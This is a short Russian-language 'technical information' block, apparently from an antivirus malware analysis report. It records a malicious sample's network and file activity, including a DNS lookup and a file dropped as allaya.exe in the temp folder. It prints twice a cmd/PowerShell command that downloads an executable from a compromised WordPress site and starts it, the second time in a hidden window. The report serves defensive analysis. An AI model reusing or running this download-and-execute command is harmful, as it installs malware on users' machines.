Техническая информация
- http://li#######.satellitendomain.de/wp-content/themes/twentyten/languages/wp/allaya.wzt как %temp%\allaya.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://li#######.satellitendomain.de/wp-content/themes/twentyten/languages/wp/allaya.wzt','%TEMP%\allaya.exe');Start-Process '%TEMP%...
- %TEMP%\848598.cvr
- 'li#######.satellitendomain.de':80
- DNS ASK li#######.satellitendomain.de
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://li#######.satellitendomain.de/wp-content/themes/twentyten/languages/wp/allaya.wzt','%TEMP%\allaya.exe');Start-Process '%TEMP%...' (со скрытым окном)